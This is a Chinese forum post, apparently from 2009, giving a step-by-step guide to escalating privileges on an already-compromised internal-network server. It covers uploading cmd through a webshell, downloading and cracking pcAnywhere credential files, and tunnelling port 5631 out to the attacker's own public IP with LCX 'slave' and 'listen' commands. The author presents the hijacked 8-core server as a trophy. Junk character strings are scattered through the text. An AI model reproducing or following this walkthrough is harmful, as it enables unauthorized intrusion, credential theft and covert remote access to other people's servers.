|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
. }8 C4 E) v" n+ t# L3 C; d
2 ~ x, _! |4 u9 J7 L9 ?% |* H$ A提权方法:pcanywhere+LCX/ k) L C+ r0 m/ T
. {$ C# H( n3 ^+ S3 i, [: ]7 d7 \- ]
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。. [+ q! v6 P: D$ G* k
0 o- ^5 V; D( f; o, T
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。 h+ r, s* ~& y4 H
7 V' u& `) F8 G
, ~( v' N+ T8 x3 [# x
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。6 o% A8 Y5 t/ a+ E) P1 ?+ R1 L( b
1 \! P0 c6 {: X$ n" C1 k
& I4 \. p. s1 b6 I& ^
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。9 n$ v6 r$ r& q( `* P# n
, r: J0 S* f2 ~5 v$ x' n
8 D$ T Y( ~3 c. f5 d |2 j4 q4 Y& G
0 ~7 D2 b, F# c" F1 n* g. j7 s5 W$ j由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
+ a, d$ b+ f- P) q5 A
% O. d! v* Y3 ]3 n: M$ c) h) r! F4 e; z8 Y/ p- D
LCX的用法再简单说下:
, U, j d2 m1 G* s z n( M( f2 F4 c) V( `( M
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
4 D; |6 s# _ z; B' G- Z. t
; u0 m+ ~6 j( Z% a7 W- Z( b* z; q本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
7 {$ g: o" j% M4 }$ d
6 A" }7 m t2 f: K由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。1 N2 T: Q, a# u {
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
( C5 L, [2 f6 u! o2 b" @9 d6 Z( D5 F! o' x h9 o7 h; D2 o
+ J$ d: a" D# a; e0 V0 l5 e6 [( F2 ?- |2 S5 e% m. R: \ c+ O
) t, r; l+ g& f# _" W; m呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。0 y* o6 H* g- Y/ c1 y2 D/ a: d- x
( ?! k/ t; y* p+ w& ^2 l! o @4 I8 `1 y& G' _' e
/ G% f4 f% e9 O! r. h
; I3 I \ N- P4 }
我们本地连接试试,输入我们刚破解的账号密码
+ v( P1 }8 U* O' a, Y2 U6 e8 T) d" c6 V
) a. ^! w7 E! j" Y* }( b% q- o呵呵``连接成功,服务器不错,又一个8核^︵^/ y6 N3 }4 Q8 M4 K2 s' D
B ^1 |3 H! U; Z* v q
+ P. N+ p+ O4 D+ Q+ v$ b/ O" |+ \1 r0 c8 R
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
